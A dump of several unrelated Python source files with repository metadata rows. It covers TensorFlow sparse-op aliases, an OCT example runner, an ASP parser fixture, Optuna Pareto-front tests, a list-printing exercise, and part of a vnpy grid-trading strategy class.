from tensorflow.python.ops.sparse_ops import sparse_concat_v2 as concat
from tensorflow.python.ops.sparse_ops import sparse_expand_dims as expand_dims
from tensorflow.python.ops.sparse_ops import sparse_eye as eye
from tensorflow.python.ops.sparse_ops import sparse_fill_empty_rows as fill_empty_rows
from tensorflow.python.ops.sparse_ops import sparse_maximum as maximum
from tensorflow.python.ops.sparse_ops import sparse_minimum as minimum
from tensorflow.python.ops.sparse_ops import sparse_reduce_max_v2 as reduce_max
from tensorflow.python.ops.sparse_ops import sparse_reduce_sum_v2 as reduce_sum
from tensorflow.python.ops.sparse_ops import sparse_reorder as reorder
from tensorflow.python.ops.sparse_ops import sparse_reset_shape as reset_shape
from tensorflow.python.ops.sparse_ops import sparse_reshape as reshape
from tensorflow.python.ops.sparse_ops import sparse_retain as retain
from tensorflow.python.ops.sparse_ops import sparse_slice as slice
from tensorflow.python.ops.sparse_ops import sparse_softmax as softmax
from tensorflow.python.ops.sparse_ops import sparse_split_v2 as split
from tensorflow.python.ops.sparse_ops import sparse_tensor_dense_matmul as sparse_dense_matmul
from tensorflow.python.ops.sparse_ops import sparse_tensor_to_dense as to_dense
from tensorflow.python.ops.sparse_ops import sparse_to_indicator as to_indicator
from tensorflow.python.ops.sparse_ops import sparse_transpose as transpose
# Machine-generated module epilogue: remove the __future__ helper from the
# public namespace, then wrap this module for API-compat/deprecation handling.
del _print_function

from tensorflow.python.util import module_wrapper as _module_wrapper

# Replace the module object in sys.modules with a TFModuleWrapper exactly
# once (the isinstance guard makes re-imports idempotent).
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
    _sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
        _sys.modules[__name__], "sparse", public_apis=None, deprecation=False,
        has_lite=False)
| 53.72 | 94 | 0.861132 | 421 | 2,686 | 5.180523 | 0.2019 | 0.220083 | 0.265933 | 0.284732 | 0.596515 | 0.596515 | 0.596515 | 0.579092 | 0.316827 | 0 | 0 | 0.003267 | 0.088235 | 2,686 | 49 | 95 | 54.816327 | 0.887301 | 0.068876 | 0 | 0 | 1 | 0 | 0.002408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.861111 | 0 | 0.861111 | 0.055556 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
92fd67bbc324f8e2c07d1b5ca255fe1b7810bf5d | 1,373 | py | Python | examples/all.py | CBORT-NCBIB/oct-cbort | 7f2bc525bb3f5b3bcf2e41622129c87ee710161a | [
"MIT"
] | 2 | 2021-12-16T00:03:19.000Z | 2022-02-21T10:58:39.000Z | examples/all.py | CBORT-NCBIB/oct-cbort | 7f2bc525bb3f5b3bcf2e41622129c87ee710161a | [
"MIT"
] | null | null | null | examples/all.py | CBORT-NCBIB/oct-cbort | 7f2bc525bb3f5b3bcf2e41622129c87ee710161a | [
"MIT"
] | 2 | 2021-11-19T02:32:50.000Z | 2021-12-16T00:05:43.000Z | import os
# Run the four oct example pipelines end-to-end for the current platform.
# The command lists are kept per-platform because the second (rat-clot)
# command's processing stages differ between the Windows and POSIX variants
# of the original script.
_nt_cmds = [
    "python -m oct examples//data//1_VL_Benchtop1_rat_nerve_biseg_n2_m5_struct_angio_ps tomo+struct+angio+ps+hsv+proj mgh 1",
    "python -m oct examples//data//2_BL_Catheter1_rat_clot_ramp_struct_ps tomo+struct+ps+proj mgh 1",
    "python -m oct examples//data//3_BL_Catheter2_human_coronary_artery_ramp_struct_ps tomo+struct+ps+proj mgh 1",
    "python -m oct examples//data//4_BL_Benchtop_Phantom_struct_angio_ps tomo+struct+ps+hsv+stokes mgh 1",
]
_posix_cmds = [
    "python -m oct examples//data//1_VL_Benchtop1_rat_nerve_biseg_n2_m5_struct_angio_ps tomo+struct+angio+ps+hsv+proj mgh 1",
    "python -m oct examples//data//2_BL_Catheter1_rat_clot_ramp_struct_ps tomo+struct+angio+ps+proj mgh 1",
    "python -m oct examples//data//3_BL_Catheter2_human_coronary_artery_ramp_struct_ps tomo+struct+ps+proj mgh 1",
    "python -m oct examples//data//4_BL_Benchtop_Phantom_struct_angio_ps tomo+struct+ps+hsv+stokes mgh 1",
]

if os.name == 'nt':
    _cmds = _nt_cmds
elif os.name == 'posix':
    _cmds = _posix_cmds
else:
    _cmds = []  # unknown platform: original script ran nothing

for _idx, _cmd in enumerate(_cmds, start=1):
    os.system(_cmd)
    print('================ {}/4'.format(_idx))
if _cmds:
    print('Test Complete')
132973a8b3fd34d6a668be5e329cef01183e43f6 | 1,693 | py | Python | tests/parser/bug.01.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.01.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.01.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
# Regression fixture for the DLV2 parser: the parser is expected to echo the
# program back unchanged, so ``output`` is byte-identical to ``input``.
# NOTE: the names ``input``/``output`` shadow builtins but are kept because
# the test harness looks them up by exactly these names.

# ASP program handed to the parser under test.
input = """
h2 :- not h.
h2 :- not h2.
h :- not v2n3,not v2n2,not v2n1.
h :- not v3n3,not v3n2,not v3n1.
h :- not v4n3,not v4n2,not v4n1.
h :- not v5n3,not v5n2,not v5n1.
h :- not v6n3,not v6n2,not v6n1.
v2n1 :- not v4n1,not v3n1,not v2n3,not v2n2.
v2n2 :- not v4n2,not v3n2,not v2n3,not v2n1.
v2n3 :- not v4n3,not v3n3,not v2n2,not v2n1.
v3n1 :- not v5n1,not v2n1,not v3n3,not v3n2.
v3n2 :- not v5n2,not v2n2,not v3n3,not v3n1.
v3n3 :- not v5n3,not v2n3,not v3n2,not v3n1.
v4n1 :- not v6n1,not v5n1,not v2n1,not v4n3,not v4n2.
v4n2 :- not v6n2,not v5n2,not v2n2,not v4n3,not v4n1.
v4n3 :- not v6n3,not v5n3,not v2n3,not v4n2,not v4n1.
s :- h2.
s :- v2n1.
s :- v2n2.
s :- v2n3.
s :- v3n1.
s :- v3n2.
s :- v3n3.
s :- v4n1.
s :- v4n2.
s :- v4n3.
s :- v5n1.
s :- v5n2.
s :- v5n3.
s :- v6n1.
s :- v6n2.
s :- v6n3.
"""

# Expected parser output (identical to the input program).
output = """
h2 :- not h.
h2 :- not h2.
h :- not v2n3,not v2n2,not v2n1.
h :- not v3n3,not v3n2,not v3n1.
h :- not v4n3,not v4n2,not v4n1.
h :- not v5n3,not v5n2,not v5n1.
h :- not v6n3,not v6n2,not v6n1.
v2n1 :- not v4n1,not v3n1,not v2n3,not v2n2.
v2n2 :- not v4n2,not v3n2,not v2n3,not v2n1.
v2n3 :- not v4n3,not v3n3,not v2n2,not v2n1.
v3n1 :- not v5n1,not v2n1,not v3n3,not v3n2.
v3n2 :- not v5n2,not v2n2,not v3n3,not v3n1.
v3n3 :- not v5n3,not v2n3,not v3n2,not v3n1.
v4n1 :- not v6n1,not v5n1,not v2n1,not v4n3,not v4n2.
v4n2 :- not v6n2,not v5n2,not v2n2,not v4n3,not v4n1.
v4n3 :- not v6n3,not v5n3,not v2n3,not v4n2,not v4n1.
s :- h2.
s :- v2n1.
s :- v2n2.
s :- v2n3.
s :- v3n1.
s :- v3n2.
s :- v3n3.
s :- v4n1.
s :- v4n2.
s :- v4n3.
s :- v5n1.
s :- v5n2.
s :- v5n3.
s :- v6n1.
s :- v6n2.
s :- v6n3.
"""
| 24.536232 | 54 | 0.608978 | 322 | 1,693 | 3.201863 | 0.065217 | 0.081474 | 0.096993 | 0.054316 | 0.989331 | 0.989331 | 0.989331 | 0.989331 | 0.989331 | 0.989331 | 0 | 0.242976 | 0.222091 | 1,693 | 68 | 55 | 24.897059 | 0.539863 | 0 | 0 | 0.970588 | 0 | 0 | 0.98097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
13964ed4a17d7aef1134965daeef986767697a24 | 3,575 | py | Python | tests/test_multi_objective.py | captain-pool/optuna | 2ae8c17afea54362460320870304c763e91c0596 | [
"MIT"
] | 1,300 | 2018-12-03T06:11:11.000Z | 2019-11-15T01:28:25.000Z | tests/test_multi_objective.py | captain-pool/optuna | 2ae8c17afea54362460320870304c763e91c0596 | [
"MIT"
] | 274 | 2018-12-04T09:54:07.000Z | 2019-11-15T02:23:18.000Z | tests/test_multi_objective.py | captain-pool/optuna | 2ae8c17afea54362460320870304c763e91c0596 | [
"MIT"
] | 148 | 2018-12-03T10:48:50.000Z | 2019-11-11T16:37:51.000Z | from typing import Tuple
from optuna import create_study
from optuna.study._multi_objective import _get_pareto_front_trials_2d
from optuna.study._multi_objective import _get_pareto_front_trials_nd
from optuna.trial import FrozenTrial
def _trial_to_values(t: FrozenTrial) -> Tuple[float, ...]:
    """Return the trial's objective values as a tuple, asserting they exist."""
    values = t.values
    assert values is not None
    return tuple(values)
def test_get_pareto_front_trials_2d() -> None:
    """Drive a 2-objective study one trial at a time and check the Pareto front."""
    study = create_study(directions=["minimize", "maximize"])

    def front() -> set:
        return {
            _trial_to_values(t)
            for t in _get_pareto_front_trials_2d(study.trials, study.directions)
        }

    # Empty study: no Pareto-optimal trials yet.
    assert front() == set()

    # (objective values, expected front after the trial is added)
    steps = [
        ([2, 2], {(2, 2)}),
        ([1, 1], {(1, 1), (2, 2)}),
        ([3, 1], {(1, 1), (2, 2)}),
        ([3, 2], {(1, 1), (2, 2)}),
        ([1, 3], {(1, 3)}),
    ]
    for values, expected in steps:
        study.optimize(lambda t, v=values: v, n_trials=1)
        assert front() == expected
    assert len(_get_pareto_front_trials_2d(study.trials, study.directions)) == 1

    # A duplicate of the best trial joins it on the front.
    study.optimize(lambda t: [1, 3], n_trials=1)
    assert front() == {(1, 3)}
    assert len(_get_pareto_front_trials_2d(study.trials, study.directions)) == 2
def test_get_pareto_front_trials_nd() -> None:
    """Drive a 3-objective study one trial at a time and check the Pareto front."""
    study = create_study(directions=["minimize", "maximize", "minimize"])

    def front() -> set:
        return {
            _trial_to_values(t)
            for t in _get_pareto_front_trials_nd(study.trials, study.directions)
        }

    # Empty study: no Pareto-optimal trials yet.
    assert front() == set()

    # (objective values, expected front after the trial is added)
    steps = [
        ([2, 2, 2], {(2, 2, 2)}),
        ([1, 1, 1], {(1, 1, 1), (2, 2, 2)}),
        ([3, 1, 3], {(1, 1, 1), (2, 2, 2)}),
        ([3, 2, 3], {(1, 1, 1), (2, 2, 2)}),
        ([1, 3, 1], {(1, 3, 1)}),
    ]
    for values, expected in steps:
        study.optimize(lambda t, v=values: v, n_trials=1)
        assert front() == expected
    assert len(_get_pareto_front_trials_nd(study.trials, study.directions)) == 1

    # A duplicate of the best trial joins it on the front.
    study.optimize(lambda t: [1, 3, 1], n_trials=1)
    assert front() == {(1, 3, 1)}
    assert len(_get_pareto_front_trials_nd(study.trials, study.directions)) == 2
| 35.39604 | 98 | 0.66042 | 550 | 3,575 | 3.976364 | 0.085455 | 0.090535 | 0.140832 | 0.201189 | 0.924097 | 0.920439 | 0.895748 | 0.853681 | 0.833105 | 0.833105 | 0 | 0.036106 | 0.20979 | 3,575 | 100 | 99 | 35.75 | 0.738053 | 0.026014 | 0 | 0.592593 | 0 | 0 | 0.011498 | 0 | 0 | 0 | 0 | 0 | 0.234568 | 1 | 0.037037 | false | 0 | 0.061728 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b9388be997e4b25d7ca44b7a16fd47593954c5cc | 1,531 | py | Python | printing_models.py | mikvikpik/Project_Training | 4d55b092f6cee696cbd93ec3d018de5ba2135167 | [
"MIT"
] | 1 | 2020-01-17T01:06:17.000Z | 2020-01-17T01:06:17.000Z | printing_models.py | mikvikpik/Project_Training | 4d55b092f6cee696cbd93ec3d018de5ba2135167 | [
"MIT"
] | null | null | null | printing_models.py | mikvikpik/Project_Training | 4d55b092f6cee696cbd93ec3d018de5ba2135167 | [
"MIT"
] | null | null | null | """ Modifying a list"""
# Inline version (no functions): drain the queue of unprinted designs,
# "printing" each one, then report everything that was produced.
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []

# Designs are consumed from the end of the list, so they complete in
# reverse of the order they were queued; the queue ends up empty.
while unprinted_designs:
    design = unprinted_designs.pop()
    # Simulate creating a 3D print from the design.
    print("Printing model: " + design)
    completed_models.append(design)

# Report every completed model.
print("\nThe following models have been printed:")
for model in completed_models:
    print(model)
# Function-based version producing the same output as the inline code above.
def print_models(unprinted_designs, completed_models):
    """Simulate 3D-printing every queued design.

    Designs are popped off the end of ``unprinted_designs`` (emptying it in
    place) and appended to ``completed_models`` as each one finishes.
    """
    while unprinted_designs:
        design = unprinted_designs.pop()
        # Simulate creating a 3D print from the design.
        print("Printing model: " + design)
        completed_models.append(design)
def show_completed_models(completed_models):
    """Report every model that has been printed, one per line."""
    print("\nThe following models have been printed:")
    for model in completed_models:
        print(model)
# Exercise the function-based version on a fresh set of designs; output
# matches the inline version earlier in the file.
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
print_models(unprinted_designs, completed_models)
show_completed_models(completed_models)
| 31.895833 | 68 | 0.747877 | 189 | 1,531 | 5.867725 | 0.291005 | 0.18936 | 0.072137 | 0.046889 | 0.844004 | 0.782687 | 0.720469 | 0.720469 | 0.720469 | 0.616772 | 0 | 0.001577 | 0.171783 | 1,531 | 47 | 69 | 32.574468 | 0.873028 | 0.320705 | 0 | 0.818182 | 0 | 0 | 0.185629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.090909 | 0.636364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
b961321bd95e72618f748377b359e5f609af0c92 | 114,175 | py | Python | vnpy/trader/app/ctaStrategy/ctaGridTrade.py | riverdarda/vnpy.-msincense | 4f39ef3269082581171f3d0d6f046224266a8d21 | [
"MIT"
] | 3 | 2020-08-14T00:06:32.000Z | 2021-11-22T00:50:02.000Z | vnpy/trader/app/ctaStrategy/ctaGridTrade.py | currently1/vnpy | 674c9f04fe7d8e0784e5d98e96cd9f797742d22a | [
"MIT"
] | null | null | null | vnpy/trader/app/ctaStrategy/ctaGridTrade.py | currently1/vnpy | 674c9f04fe7d8e0784e5d98e96cd9f797742d22a | [
"MIT"
] | 3 | 2020-03-07T12:45:00.000Z | 2021-02-14T03:10:38.000Z | # encoding: UTF-8
import os,sys
from datetime import datetime
import json
import uuid
import shutil
from collections import OrderedDict
from vnpy.trader.app.ctaStrategy.ctaBase import *
from vnpy.trader.vtConstant import *
import traceback
DEBUGCTALOG = True
"""
网格交易,用于套利单
作者:李来佳,QQ/Wechat:28888502
ChangeLog:
160713,修改closeGrid,增加volume字段,关闭网格时,根据价格和交易量进行双重匹配.
160715,增加保存json和重启后加载本地json文件
170504,增加锁单网格
170707,增加重用选项
170719, 增加网格类型
171208,增加openPrices/snapshot
180420, 增加CtaLegacyGridTrade(传统网格:上网格做多,下网格做空)
"""
# 网格类型
SPREAD_GRID = 'spread' # 价差回归网格
PERIOD_GRID = 'period' # 周期网格
TREND_GRID = 'trend' # 趋势网格
LOCK_GRID = 'lock' # 对锁网格
class CtaGrid(object):
    """A single grid, the smallest unit of grid trading.

    Carries the trade direction, open/close/stop prices, volumes and the
    order/open/close state of one grid line, plus json persistence helpers.
    """

    def __init__(self, direction, openprice, closeprice, stopprice=EMPTY_FLOAT, volume=1, type=EMPTY_STRING, vtSymbol=EMPTY_STRING):
        # NOTE: the parameter name ``type`` shadows the builtin; it is kept
        # because existing callers pass it by keyword (type=...).
        self.id = str(uuid.uuid1())       # unique id of this grid
        self.direction = direction        # trade direction (LONG: long/forward spread; SHORT: short/reverse spread)
        self.openPrice = openprice        # open price
        self.closePrice = closeprice      # close (take-profit) price
        self.stopPrice = stopprice        # stop-loss price
        self.vtSymbol = vtSymbol          # contract symbol
        self.volume = volume              # volume to open
        self.tradedVolume = EMPTY_INT     # filled volume: open qty when opening, close qty when closing
        self.orderStatus = False          # True while an order for this grid is pending
        self.orderRef = EMPTY_STRING      # broker order id
        self.openStatus = False           # True once the position is open
        self.closeStatus = False          # True once the position is closed
        self.openDatetime = None          # when the grid was opened
        self.orderDatetime = None         # when the order was submitted
        self.lockGrids = []               # open prices of grids locked against this one
        self.reuse = False                # keep the grid after close instead of deleting it
        self.type = type                  # grid type tag (spread/period/trend/lock)
        self.openPrices = {}              # per-leg open prices for arbitrage, {symbol: price}
        self.snapshot = {}                # snapshot data captured at open time (e.g. state at entry)

    def toJson(self):
        """Serialise the grid's state to an OrderedDict suitable for json.dump."""
        j = OrderedDict()
        j['id'] = self.id
        j['direction'] = self.direction
        j['openPrice'] = self.openPrice        # open price
        j['closePrice'] = self.closePrice      # close price
        j['stopPrice'] = self.stopPrice        # stop-loss price
        j['vtSymbol'] = self.vtSymbol          # contract symbol
        j['volume'] = self.volume              # volume to open
        j['tradedVolume'] = self.tradedVolume  # filled volume
        j['orderStatus'] = self.orderStatus    # order pending flag
        j['orderRef'] = self.orderRef          # broker order id
        j['openStatus'] = self.openStatus      # open flag
        j['closeStatus'] = self.closeStatus    # closed flag
        j['lockGrids'] = self.lockGrids        # locked grids
        j['reuse'] = self.reuse                # reuse flag
        j['type'] = self.type                  # grid type
        j['openPrices'] = self.openPrices      # per-leg open prices (arbitrage)
        j['snapshot'] = self.snapshot          # snapshot data

        # FIX: identity check instead of the ``type(x) == type(None)`` anti-idiom.
        if self.openDatetime is None:
            j['openDatetime'] = EMPTY_STRING
        else:
            try:
                j['openDatetime'] = self.openDatetime.strftime('%Y-%m-%d %H:%M:%S')
            except Exception:
                # Unformattable timestamp: persist as empty rather than crash.
                j['openDatetime'] = EMPTY_STRING
        return j

    def fromJson(self, j):
        """Restore the grid's state from a json dict (inverse of toJson)."""
        try:
            self.id = j.get('id', None)
            if self.id is None:
                # Older files had no id: assign a fresh one.
                self.id = str(uuid.uuid1())
            self.direction = j.get('direction', EMPTY_STRING)
            self.closePrice = j.get('closePrice', EMPTY_FLOAT)
            self.openPrice = j.get('openPrice', EMPTY_FLOAT)
            self.stopPrice = j.get('stopPrice', EMPTY_FLOAT)
            self.orderStatus = j.get('orderStatus', False)   # order pending flag
            self.orderRef = j.get('orderRef', EMPTY_STRING)  # broker order id
            self.openStatus = j.get('openStatus', False)     # open flag
            self.closeStatus = j.get('closeStatus', False)   # closed flag

            strTime = j.get('openDatetime', None)
            if strTime == EMPTY_STRING or strTime is None:
                self.openDatetime = None
            else:
                self.openDatetime = datetime.strptime(strTime, '%Y-%m-%d %H:%M:%S')

            self.vtSymbol = j.get('vtSymbol', EMPTY_STRING)
            self.volume = j.get('volume', EMPTY_FLOAT)
            self.tradedVolume = j.get('tradedVolume', EMPTY_FLOAT)  # filled volume
            self.lockGrids = j.get('lockGrids', [])
            self.type = j.get('type', EMPTY_STRING)
            if self.type is False:
                # Legacy files stored json ``false`` instead of an empty string.
                self.type = EMPTY_STRING
            self.reuse = j.get('reuse', False)
            self.openPrices = j.get('openPrices', {})
            self.snapshot = j.get('snapshot', {})
        except Exception as ex:
            print('CtaGrid fromJson Exception:{} {}'.format(str(ex), traceback.format_exc()), file=sys.stderr)

    def toStr(self):
        """Return a short human-readable description of the grid."""
        # FIX: renamed the local variable (it previously shadowed builtin ``str``).
        text = u'o:{}/{};c:{}/{},r:{}/opentime:{}/ordertime:{}'\
            .format(self.openPrice, self.openStatus, self.closePrice,
                    self.closeStatus, self.orderRef, self.openDatetime, self.orderDatetime)
        if len(self.vtSymbol) > 0:
            return u'{} {}'.format(self.vtSymbol, text)
        return text

    def __eq__(self, other):
        # Grids are identified purely by their uuid.
        return self.id == other.id
class CtaGridTrade(object):
    """Grid-trading manager holding one grid queue per direction.

    v1: basic version
    v2: added minimum-price-tick handling and dynamic up/down grid spacing
    v3: merged the up/dn grid queues into a single persistence file
    """
    def __init__(self, strategy, maxlots=5, height=2, win=2, vol=1, minDiff = 1):
        """Initialise the grid manager.

        maxlots: maximum number of grids per side
        height:  grid height (absolute value, includes minDiff)
        win:     take-profit height (includes minDiff)
        vol:     volume opened per grid
        minDiff: minimum price tick
        """
        self.minDiff = minDiff
        self.strategy = strategy
        self.jsonName = self.strategy.name  # strategy name (used to name the json file)
        self.useMongoDb = True
        self.maxLots = maxlots  # default number of grids
        self.gridHeight = height  # minimum grid height
        self.gridWin = win  # minimum take-profit height
        self.volume = vol  # volume opened per grid
        self.volumeList = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]  # per-level open-volume multipliers
        self.upGrids = []  # upper grid list (short side only)
        self.dnGrids = []  # lower grid list (long side only)
        self.avg_up_open_price = EMPTY_FLOAT  # average open price of upper grids
        self.avg_dn_open_price = EMPTY_FLOAT  # average open price of lower grids
        self.max_up_open_price = EMPTY_FLOAT  # per the name: max upper open price (original comment said "average" — looks like a copy-paste slip)
        self.min_dn_open_price = EMPTY_FLOAT  # per the name: min lower open price (original comment said "average" — looks like a copy-paste slip)
        self.json_file_path = os.path.join(self.get_data_folder(), u'{}_Grids.json'.format(self.jsonName))  # path of the grid persistence file
    def changeGridHeight(self, grid_height=EMPTY_FLOAT, grid_win=EMPTY_FLOAT):
        """Update the grid spacing (grid_height) and take-profit height (grid_win)."""
        self.gridHeight = grid_height
        self.gridWin = grid_win
def getVolumeRate(self, gridIndex=EMPTY_INT):
"""获取网格索引对应的开仓数量比例"""
if gridIndex >= len(self.volumeList) or gridIndex < 0:
return 1
rate = self.volumeList[gridIndex]
if rate == 0:
return 1
else:
return rate
    def initGrid(self, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, max_lots=EMPTY_INT, reuse= False):
        """Initialise both grid queues.

        upline: upper resistance line (short grids start here and go up)
        dnline: lower support line (long grids start here and go down)
        max_lots: override for the number of grids (falls back to self.maxLots)
        reuse: mark created grids as reusable after close
        """
        if max_lots > EMPTY_INT:
            lots = max_lots
        else:
            lots = self.maxLots
        self.writeCtaLog(u'初始化网格队列,upline:{0},dnline:{1}'.format(upline, dnline))

        # Initialise the upper (short) grid list.
        if len(self.upGrids) == 0:
            # Try reloading previously persisted grids first.
            self.upGrids = self.load(direction= DIRECTION_SHORT)
            if len(self.upGrids) > 0:
                self.writeCtaLog(u'上网格从文件{}加载完成'.format(self.json_file_path))
            else:
                # Short side: open at upline + height*i, take profit at open - gridWin.
                for i in range(0, lots, 1):
                    grid = CtaGrid(direction=DIRECTION_SHORT,
                                   openprice=upline+self.gridHeight*i,
                                   closeprice=upline+self.gridHeight*i-self.gridWin,
                                   volume=self.volume*self.getVolumeRate(i))
                    if reuse:
                        grid.reuse = reuse
                    self.upGrids.append(grid)
                self.writeCtaLog(u'上网格{0}~{1}初始化完成'.format(upline,upline+self.gridHeight*self.maxLots))
            # Persist the (loaded or freshly built) upper grids.
            self.save(direction=DIRECTION_SHORT)

        # Initialise the lower (long) grid list.
        if len(self.dnGrids) == 0:
            self.dnGrids = self.load(direction= DIRECTION_LONG)
            if len(self.dnGrids) > 0:
                self.writeCtaLog(u'下网格从文件{}加载完成'.format(self.json_file_path))
            else:
                for i in range(0, lots, 1):
                    # Long side: open at dnline - height*i, take profit at open + gridWin.
                    grid = CtaGrid(direction=DIRECTION_LONG,
                                   openprice=dnline - self.gridHeight * i,
                                   closeprice=dnline - self.gridHeight * i + self.gridWin,
                                   volume=self.volume*self.getVolumeRate(i))
                    if reuse:
                        grid.reuse = reuse
                    self.dnGrids.append(grid)
                self.writeCtaLog(u'下网格{0}~{1}初始化完成'.format(dnline,dnline-self.gridHeight*self.maxLots))
            self.save(direction=DIRECTION_LONG)
    def writeCtaLog(self, log):
        """Delegate log output to the owning strategy's CTA log."""
        self.strategy.writeCtaLog(log)
def toStr(self, direction):
"""显示网格"""
pendingCloseList = u'' # 平仓清单
pendingOpenList = u'' # 开仓清单
deactiveList = u'' # 待激活清单
openedVolumeDict = {} # 开仓数量汇总
if direction == DIRECTION_LONG:
for grid in self.dnGrids:
t = EMPTY_STRING
if grid.type == LOCK_GRID:
t = u'L:'
elif grid.type == TREND_GRID:
t = u'T:'
elif grid.type == PERIOD_GRID:
t = u'P:'
else:
t = grid.type
# 待平仓
if grid.openStatus:
opened_volume = 0
if grid.tradedVolume == EMPTY_INT:
pendingCloseList = pendingCloseList + u'{}[{}->{},sp:{},v:{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
opened_volume = grid.volume
else:
pendingCloseList = pendingCloseList + u'[{}{}->{},sp:{},v:{}/{}];'\
.format(t, grid.openPrice, grid.closePrice, grid.volume, grid.stopPrice, grid.tradedVolume)
opened_volume = grid.volume - grid.tradedVolume
if grid.type != EMPTY_STRING:
openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
# 待开仓成交
elif not grid.openStatus and grid.orderStatus:
if grid.tradedVolume == EMPTY_INT:
pendingOpenList = pendingOpenList + u'[{}{},v:{}];'.format(t, grid.openPrice, grid.volume)
else:
pendingOpenList = pendingOpenList + u'[{} {},v:{}/{}];'\
.format(t, grid.openPrice, grid.volume, grid.tradedVolume)
# 等待挂单
else:
deactiveList = deactiveList + u'[{}{}];'.format(t, grid.openPrice)
return u'多:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList, pendingOpenList, deactiveList)
if direction == DIRECTION_SHORT:
for grid in self.upGrids:
t = EMPTY_STRING
if grid.type == LOCK_GRID:
t = u'L:'
elif grid.type == TREND_GRID:
t = u'T:'
elif grid.type == PERIOD_GRID:
t = u'P:'
else:
t = grid.type
# 待平仓
if grid.openStatus:
opened_volume = 0
if grid.tradedVolume == EMPTY_INT:
pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{},v:{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
opened_volume = grid.volume
else:
pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{}, v:{}/{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume, grid.tradedVolume)
opened_volume = grid.volume - grid.tradedVolume
if grid.type != EMPTY_STRING:
openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
# 待开仓成交
elif not grid.openStatus and grid.orderStatus:
if grid.tradedVolume == EMPTY_INT:
pendingOpenList = pendingOpenList + u'[{} {},v:{}];'.format(t, grid.openPrice, grid.volume)
else:
pendingOpenList = pendingOpenList + u'[{} {},v:{}/{}];'\
.format(t, grid.openPrice, grid.volume, grid.tradedVolume)
# 等待挂单
else:
deactiveList = deactiveList + u'[{}{}];'.format(t, grid.openPrice)
return u'空:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList,pendingOpenList,deactiveList)
def getGridsWithTypes(self, direction, types=[]):
    """Return the grids whose type label is listed in *types*.

    direction: DIRECTION_LONG reads dnGrids, DIRECTION_SHORT reads upGrids.
    types: list of grid type labels to match.
    """
    if direction == DIRECTION_LONG:
        source = self.dnGrids
    elif direction == DIRECTION_SHORT:
        source = self.upGrids
    else:
        return None
    return [g for g in source if g.type in types]
def getOpenedGridsWithTypes(self, direction, types=[]):
    """Return the grids that hold a position and whose type is in *types*.

    direction: DIRECTION_LONG reads dnGrids, DIRECTION_SHORT reads upGrids.
    types: list of grid type labels to match.
    """
    if direction == DIRECTION_LONG:
        source = self.dnGrids
    elif direction == DIRECTION_SHORT:
        source = self.upGrids
    else:
        return None
    return [g for g in source if g.openStatus and g.type in types]
def getOpenedGrids(self, direction,allow_empty_volume = False):
    """Return the grids that currently hold a position.

    direction: DIRECTION_LONG reads dnGrids, DIRECTION_SHORT reads upGrids.
    allow_empty_volume: when True, also keep grids whose remaining
    (volume - tradedVolume) is zero or negative.
    """
    if direction == DIRECTION_LONG:
        pool = self.dnGrids
    elif direction == DIRECTION_SHORT:
        pool = self.upGrids
    else:
        return None
    return [g for g in pool
            if g.openStatus and (allow_empty_volume or g.volume - g.tradedVolume > 0)]
def getGrids(self, direction, ordered=False, opened=False, closed=False, begin=EMPTY_FLOAT, end=EMPTY_FLOAT, type=EMPTY_STRING):
    """Filter one direction's grids by status flags, open-price range and type.

    direction: DIRECTION_LONG reads dnGrids, DIRECTION_SHORT reads upGrids.
